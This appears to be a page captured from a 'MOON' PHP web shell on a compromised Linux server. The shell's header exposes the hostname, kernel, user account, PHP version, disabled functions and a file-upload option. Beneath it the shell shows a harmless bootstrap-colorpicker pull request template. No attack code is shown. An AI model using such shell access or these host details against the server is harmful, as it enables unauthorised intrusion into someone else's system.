MOON
Server: Apache
System: Linux server1.studioinfinity.com.br 2.6.32-954.3.5.lve1.4.90.el6.x86_64 #1 SMP Tue Feb 21 12:26:30 UTC 2023 x86_64
User: artinside (517)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //proc/self/cwd/sabbry/admin-assets/assets/colorpicker/.github/PULL_REQUEST_TEMPLATE.md
<!-- 

FILLING THIS TEMPLATE IS MANDATORY IN CASE YOU MODIFY THE SOURCE CODE.

Thank you for your contribution to bootstrap-colorpicker! Please replace {Please write here} with your description.
Please note that PRs not following this template may be potentially discarded if they are not clear enough.
-->

### Description

{Please write here}

### Check list

- [ ] The `dist` files have been regenerated with `npm run build` and committed in this PR.
- [ ] New tests have been added or modified for the introduced changes.
- [ ] New examples have been added for the newly introduced features.
- [ ] All tests are green after running `npm test`.
- [ ] All examples are still working at least in latest Chrome and Firefox.
- [ ] This PR follows all other [`CONTRIBUTING.md`](.github/CONTRIBUTING.md#pull-requests) guidelines for Pull Requests.